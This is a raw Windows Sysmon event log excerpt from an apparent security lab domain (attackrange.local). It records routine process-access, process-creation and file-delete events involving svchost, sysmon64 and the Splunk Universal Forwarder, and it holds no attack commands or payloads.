08:03:34.462{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083756Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:34.462{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083755Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:34.462{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083754Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:34.462{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083753Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:34.462{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083752Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:34.462{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083751Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:34.462{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083750Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:34.462{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083749Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:34.462{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B556-615A-A001-00000000FD01}1980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083748Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:34.462{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B556-615A-A001-00000000FD01}1980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083747Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:34.463{2FDD8D40-B556-615A-A001-00000000FD01}1980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000083778Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:35.681{2FDD8D40-B557-615A-A101-00000000FD01}2632316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000083777Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:35.572{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81DAA2EAF0273958484BE05A14F21468,SHA256=CB6C01501E28A215239CD54D6224C120B1D81B4F95E0F7E10265E528EB580659,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108225Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:35.777{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=810826A17A262BB38969F09667AAFB26,SHA256=5E98E5638E96F034D92976943B473D79BAD755A7C31EEADE2D38FBF357190C41,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083776Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:35.525{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B557-615A-A101-00000000FD01}2632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083775Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:35.525{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083774Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:35.525{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083773Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:35.525{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083772Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:35.525{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083771Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:35.525{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083770Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:35.525{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083769Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:35.525{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083768Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:35.525{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083767Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:35.525{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083766Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:35.525{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B557-615A-A101-00000000FD01}2632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083765Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:35.525{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B557-615A-A101-00000000FD01}2632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083764Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:35.526{2FDD8D40-B557-615A-A101-00000000FD01}2632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000083763Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:35.462{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C930E637082BF923C5A9963BAEC49D98,SHA256=102E15E0B07DE30A36A0C9F12D0A34ABD629B03C124BAA2CA670ED254E4737AB,IMPHASH=00000000000000000000000000000000falsetrue 